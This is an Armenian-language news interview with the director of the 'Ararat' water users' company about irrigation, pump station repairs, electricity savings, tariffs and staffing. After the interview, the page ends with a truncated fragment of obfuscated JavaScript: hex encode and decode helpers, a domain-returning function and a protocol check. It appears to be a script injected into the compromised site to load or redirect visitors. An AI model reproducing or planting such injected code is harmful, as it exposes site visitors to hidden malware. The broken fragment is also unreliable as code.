Ջրօգտագործողի ճիշտ պլանավորումը կհանգեցնի շահավետ արդյունքի․ Խաչիկ Հարությունյան

34

Խաչիկ Հարությունյան .«Արարատ » ՋՕԸ-ի տնօրեն

«Արարատ» ՋՕ ընկերության տնօրեն Խաչիկ Հարությունյանի հետ մեր զրույցի նպատակը երկրի տնտեսության համար այդ հույժ կարևոր համակարգի կառավարման նրբությունները բացահայտելն էր:Համակարգառանց որի   գյուղատնտեսության նորմալ գործունեության զարգացումը անհնար է պատկերացնել:«Արարատ» ՋՕ ընկերությունը սպասարկում է 13 համայնքներ: Այս ընկերության ջանքերի `այնտեղ աշխատող, իրենց գործին գիտակ մարդկանց շնորհիվ է, որ Արարատյան դաշտավայրի բերք ու բարիք ստեղծող ու արարող հայ գյուղացին իր բերքն աճեցնելու դժվարին ճանապարհին `ջրի հետ կապված խնդիրներ համարյա չի ունենում:Դժվարությունները հաղթահարվում են,  նվաճումների ուղին առավել հարթ ու դյուրին է դառնում այն դեպքում, երբ կոլեկտիվը ղեկավարում է արհեստավարժ  տնօրեն: «Արարատ» ՋՕ ընկերությունը  2005թ մինչ օրս ղեկավարում է Խաչիկ Հարությունյանը:

– Պարոն Հարությունյան սկսվել են արդեն գարնան նախապատրաստական աշխատանքները, ինչպիսի՞ միջոցառումներ եք իրականացնում։

-Այո արդեն սկսվել են գարնան նախապատրաստական աշխատանքները, դեռևս  փետրվարի 20-ից, և ավարտվել են մարտի 20-ին։ Նախապատրաստական աշխատանքներ ասելով նկատի ունենք պոմպակայանների վերանորոգում, վերակառուցում, իսկ ավելի վաղ նոյեմբեր-դեկտեմբեր ամիսներին, սկսում ենք դեմոնտաժային աշխատանքները, ջրամատակարարման պոմպակայանների շարժիչները  բոլորն ուղարկվում են նորոգումների:

-ՀՀ վարչապետը ,հանձնարարել է ֆինանսների նախարարությանը ստուգել որոշ ջրօգտագործող ընկերությունների ֆինանսական գործունեությունը, ինչպես նաև տարիների ընթացքում առաջացած էլեկտրաէներգիայի պարտավորությունների հիմնավորումն ու անաչառությունը:Պատասխանատվության ենթարկվեն այն մարդիկ, ովքեր մեղավոր են էլեկտրաէներգիան չխնայելու և անհիմն ծախսեր կատարելու հարցում: Ի՞նչ եք կարծում այդ մասով Արարատ ՋՕԸ կունենա խնդիրներ:

-Գյուղացին  գարնանը սկսում են կռիվ տալ հողի հետ, իսկ ամռանը ոռոգման ջրի պակասի դեպքում բերքը չորանում է, աշնանն էլ գյուղացին կանգնում է կոտրած տաշտակի առաջ: Տեղյակ եմ ,որ վարչապետը հանձնարարել է  ստուգել  ջրօգտագործող ընկերությունների ֆինանսական գործունեությունը:Միանշանակ , կարող եմ ասել ,որ իմ ղեկավարած ընկերությունում նման խնդիր չունեմ:Խնդրեմ .ովքեր կցանկանան ,թող գան ստուգեն …եթե կգտնեն անտեղի էլեկտրաէներգիայի վատնում թող ենթարկվենք պատասխանատվության:

-Ո՞րն եք համարում «Արարատ» ՋՕ ընկերություն ձեռքբերումը այս տարիների ընթացքում:

– Ամենամեծ ձեռքբերումը կարելի է համարել այն, որ կարողացել ենք կտրուկ կրճատել ծախսվող էլելեկտրոէներգիայի քանակությունը։ Իմ պաշտոնավարման սկզբնական տարիներին մինչև 28.000000 կիլովատ էլեկտրոէներգիա էր ծախսվում։ Այս տարիների ընթացքում հասել ենք նրան, որ այսօր արդեն 14.200000 կիլովատ էլեկտրոէներգիա է ծախսվում։ Սրան մենք հասել ենք Ջրային Կոմիտեի և «Արարատ» ջրօգտագործողների ընկերության աշխատակիցների ջանքերի, խնայողությունների ու ներդրումների շնորհիվ: «Արարատ» ՋՕԸ-ն 98 տոկոսով իրականացնում է մեխանիկական ոռոգում, որի շնորհիվ էլ էլեկտրաէներգիայի խնայողություն, և ջրի ճիշտ ռացիոնալ բաշխում ենք գրանցում։ Ընկերությունն ունի շարժական ջրաչափեր, որոնց միջոցով ընկերության մասնագետները չափում են հողային հունով ջուրը և տալիս ջրօգտագործողին, որտեղից էլ առաջանում է ջրօգտագործող-ընկերություն փոխվստահությունը:

Ինչպիսի՞ն է կապը բնակչության հետ.Ի՞նչ դժվարությունների հանդիպեցիք:

Այս տարիների ընթացքում կարողացել ենք ջրօգտագործողների ընկերության և ջրօգտագործողներ միջև հարաբերությունները հասցնել մաքսիմալ փոխըմբռնման մակարդակի։

Մարդիկ հասկացել են, որ ջուրն ապրանք է, որի համար պետք է վճարել: Իհարկե շատ դեպքերում գիտենք, թե ինչպիսի դժվարությամբ են մարդիկ վճարում ոռոգման ջրի համար, որ շատերի սոցիալական պայմանները թույլ չեն տալիս, լիարժեք վճարումներ կատարել։ Սակայն մեր և ժողովրդի միջև փոխադարձ համաձայնությունն ու վստահությունը միշտ առկա է, ուստի լուրջ խնդիրներ երբեք առաջ չեն գալիս:

Աշխատանքս ավելի ծավալուն և պատասխանատու  է, թեև ես դժվարություններից երբեք չեմ խուսափել։ Մենք սպասարկում ենք բազմաքանակ համայնքների, ամեն օր շփվում գյուղացիների հետ, պատասխանում նրանց հարցերին, փորձում լուծել առաջացած խնդիրները։ Ես կարծում եմ, որ ճիշտ կառավարում իրականացնելով՝ հնարավոր է բոլոր խնդիրներին լուծում տալ։ Երբ սիրով ես աշխատում, չես կենտրոնանում դժվարությունների վրա, այլ ընդհակառակը՝ փորձում ես հնարավորինս արդյունավետ աշխատել և կենտրոնանալ ձեռքբերումների վրա։ Ես այդպես էլ անում եմ. վաղ առավոտից շրջում եմ համայնքներով, շփվում գյուղացիների հետ, անձամբ ստուգում, թե ինչպես է իրականացվում ջրամատակարարումը։

-Նշեցիքոր կարևորում եք արդյունավետ կառավարումը։ Կներկայացնե՞ք կառավարման Ձեր մեխանիզմը։

-Մենք սպասարկում ենք Արարատ քաղաքի տարածքում գտնվող բոլոր համայնքները։Իմ տեղակալներից յուրաքաչյուրը պատասխանատու է համայնքներում նորմալ ջրամատակարարում իրականացնելու համար, նրանցից յուրաքանչյուրը վերահսկում է իրեն հանձնարարված համայնքները և ողջ օրն անցկացնում այնտեղ՝ տեղում հսկելով և խնդիրներին լուծում տալով։ Ողջ օրվա ընթացքում նրանք ինձ հետ կապ են պաշտպանում, տեղեկացնում իրավիճակի մասին։  Ամեն դեպքում շարունակ աշխատանք կա, ամեն տարի պետք է մի բան արվի՝  ջրընդունիչ ավազանների վերակառուցում, բետոնապատում, երեսապատումներ։ Մեխանիկական ոռոգման համակարգով բարդ է աշխատելը ,մենք էներգակիրներով հարուստ երկիր չենք։

Իսկ խափանումներ լինո՞ւմ են։

-Խափանումենր չեն լինում, որովհետև 41 հոսքային-խորքային պոմպեր ունենք, որոնք տեղակայված են տարբեր գյուղերում։ Ամեն պոմպի մակնիշով ունենք փոխարինող պոմպ, և եթե որևէ պոմպ ինչ-ինչ անսարքությունների պատճառով խափանվում է, հաջորդ օրը դրա փոխարեն տեղադրվում է նորը։ Խափանված պոմպի վերանորոգման աշխատանքները տևում են մեկ շաբաթ։ Չնայած, պետք է ընդգծեմ, որ հիմա արդեն հասել ենք նրան, որ խափանումներ, ջրազրկումներ, չորացման դեպքեր չկան։ Սա շատ մեծ ձեռքբերում է:

Պարո՛ն Հարությունյան ամռան շոգ ամիսներին ջրի պակասի խնդիր միշտ նկատելի է և հատկապես հուլիս-օգոստոս ամիսներին։

-Այո՛, ամռան ամիսներին ջրի սակավություն նկատվեց , սակայն այս տարի այդ խնդիրն ավելի վառ արտահայտվեց։ Ջրային տնտեսությունում իմ աշխատած 10 տարիների ընթացքում այս տարին ամենասակավաջուր տարիներից էր, և ՋՕԸ-երի մեծ մասը, այդ թվում և «Արարատ » ՋՕԸ-ը, ջրամատակարարումն իրականացնում է զուտ մեխանիկական եղանակով, որը և լրացուցիչ ջանքեր է պահանջում համայնքներին նորմալ ջրամատակարարում իրականացնելու գործընթացում։ Եվ հատկապես օգոստոս ամիսը ասում ենք թեժ, քանի որ հուլիս-օգօստոս ամսիներին  ամենաշոգ եղանակային պայմաններ են ստեղծվում,  արդեն մշակաբույսերը շատ են ջուր պահանջում։

Ի՞նչքան է կազմում այսօր ոռոգման ջրի սակագինը:

– Ջրի ինքնարժեքը «Արարատ» ՋՕԸ-ում կազմում է 23,7 դրամ, որի դիմաց գյուղացին վճարում է 11 դրամ իսկ մնացած 16,3 դրամը սուբսիդավորվում է պետության կողմից` ստացված ջրի դիմաց ծախսված էլեկտրական էներգիայի համար:

Ի՞նչ տեխնիկական խնդիրներ կան համակարգում:

– Հիմնական խնդիրն այն է, որ պոմպակայանները շատ հին են. դրանք 40-45 տարվա են: Այս տարիների ընթացքում մետաղը՝ ճնշման տակ գտնվելով կոռոզիայի է ենթարկվել։ Մեզ հաջողվել է 4 ՝ ամենավատ վիճակում գտնվող պոմպակայանները նոր պոմպերով, նոր սարքավորումներով վերակառուցել ի շնորհիվ «Հազարամյակի մարտահրավերներ» հիմնադրամի։ Արմաշի պոմպակայանը վերազինված է նոր սարքավորումներով, միայն մնում է խողովակաշարերը փոխվեն, այդ աշխատանքները ներառված են հետագա ծրագրերի մեջ։ Ավշար-Այգավան պոմպակայանը հիմնովին վերանորոգվել է։ Մնացած պոմպակայանների վիճակը հիմնականում նորմալ է: Բացառությամբ Արազափ պոմպակայանի, որը նոր վերազինման կարիք ունի: Տարեցտարի կորուստներ ավելի քիչ ենք ունենում։  Համաշխարհային բանկի միջոցով կատարվել են երեսապատումներ, 7500մ ջրահեռացնող, երեսապատող աշխատանքներ, որը այս տարի առաջ  բերել է 85 հա նոր հողերի ոռոգում, այիսնքն առավել ջրաշրջանառություն պետք է կատարվի։

-Ունե՞ք նոր ծրագրեր, որոնք իրականացման շեմին են։

– Այո, Սևակավան համայնքի մղման խողովակաշարը վերանորոգում ենք, 320  ճնշման տակ, քանի որ բարձրադիր է, նախկինի շահագործման ժամկետը անցել էր, կոռոզիայի էր ենթարկվել, պետք է վերակառուցվի հիմնովին։ Հուսով ենք մինչև աշուն աշխատանքներին զարկ կտանք։

-Ինչպե՞ս եք մոտենում համակարգի ժամանակակից որոշումներին, օրինակ ինքնահոս համակարգի զարգացումը։

-Համակարծիք եմ ինքնահոս համակարգի տարածմանը։ Մենք պետք է հասնենք նրան, որ  հոսանքի խնայողության   դեպքում պետության սուբսիդիան և էլ․խնայողությունը կնպաստի այլ ծրագրերի զարգացմանը։ Մենք պետք է այնպես աշխատենք, որ ոռոգելի հողերը ոռոգվի, ամեն ինչ անել խնայողաբար մոտենալ հարցին։ Դեռ հավելեմ այն, որ աշխարհում շատ մեծ տարածում է գտնում կաթիլային ոռոգումը․որը տանում է  ջրօգտագործողների կողմից ավելի  ջրի սպառմանը , և հետևաբար գումարի խնայողությանը։ Գլոբալ հարց է դա, շատ երկրներ ծովի ջուրն են մշակում նոր ոռոգում, մենք ունենք այդ հնարավորությունը, քանի ունենք Աստծո կողմից տրվածը օգտագործենք խելամտորեն։

–Ինչպիսին են Ձեր հարաբերությունները աշխատակիցների հետ :Անձնակազմում կա՞ներիտասարդ կադրեր։

Միշտ աշխատում եմ համակարգը համալրել երիտասարդ կադրերով, և այսօր մեր ընկերությունում ավելի շատ գերակշռում են երիտասարդ աշխատակիցները, քանի որ աշխատանքի բնույթն ավելի էներգատար է, և պահանջում է երիտասարդ կադրեր։ Բայց ունենք նաև անփոխարինելի ինժեներներ, հիդրոտեխնիկներ, ովքեր ունեն աշխատանքային մեծ փորձ, և ովքեր իրենց փորձն են փոխանցում նաև երիտասարդներին, քանի որ վաղ թե ուշ յուրաքանչյուր փորձառու մասնագետի հարկավոր են փոխարինողներ: Ինչ վերաբերում է աշխատողների հետ հարաբերություններին, դրանք աշխատանքային են։ Աշխատանքից դուրս էլ՝ մտերմիկ, նորմալ փոխհարաբերություններ են, առանց որի անհնարին կլիներ։ Զուտ պաշտոնական փոխհարաբերություններով որևէ ղեկավար չիկարող լավ ցուցանիշների հասնել, լավ արդյունք ունենալ, մեր դեպքում՝ լավջրամատակարարում ապահովել: Մեր ընկերությունում ամեն ինչը մարդկային, նորմալ փոխհարաբերությունների հիման վրա է ձևավորված։

Այս ամենին հավելենք նաև այն, որ Արարատ ՋՕԸ տարբերվում է հանրապետության մյուս ՋՕԸ-ներից նրանով որ 98 տոկոսով մեխանիկական ոռոգում է իրականացնում։ Այն կատարվում է 41 խորքային պոմպերի և 7 խոշոր պոմպակայանների միջոցով, որոնք տեղակայված են տարբեր գյուղերում, և էլեկտրոէներգիա ծախսելով ՝ ջուրը մղում և վերամղում է մինչև 4 գոտիներում:

Զրույցի վերջում Խաչիկ Հարությունյանը ցանկացավ 2016թն այնքան բարենպաստ լինի գյուղացու համար, որ մոռացվեն անցած տարվա դժվարությունները, որ գյուղացին կարողանա արժանապատիվ ապրել: Մի բան հաստատ է՝ աշխատող մարդը երբեք սոված չի մնա: Հող մշակելն ամենապատվաբեր գործն է, ճիշտ ու քրտնաջան աշխատանքի արդյունքում,համոզված եմ, հողը վարձահատույց կլինի իր նվիրյալ մշակին

Արդեն սկսվել են գարնան գյուղատնտեսական աշխատանքները, բերք ու բարիք տված հողը նորից կարթնանա ,որ գարնանամուտին նորից ջուր խմի,պտուղ տա,բերք ու բարիք բերի հայ ընտանիքներին:«Արարատ» ՋՕ ընկերությունում սեզոնն սկսված է  լավ ցուցանիշներով.գյուղացին գոհ է նրանց աշխատանքից,իրենց պատճառով խնդիրներ չեն առաջանում սեզոնին :Իսկ դա ամենամեծ վարձատրությունն է ընկերության աշխատակիցների համար`իրենց ծանր ու դժվարին,անչափ պատասխանատու աշխատանքի համար: Մաղթանքս է, որ ջրօգտագործողներս իրենք էլ կարողանան ճիշտ պլանավորել , փոքր հողի պայմաններում արտադրեն այն բերքը , որը որ պահանջարկ ունի։

Մենք հաջողություն մաղթեցինք ընկերության տնօրենին ու աշխատակիցներին`մաղթելով նորանոր հաջողություններ ու ձեռքբերումներ , բերրի ու բերքաշատ տարիներ: 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "mnews.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e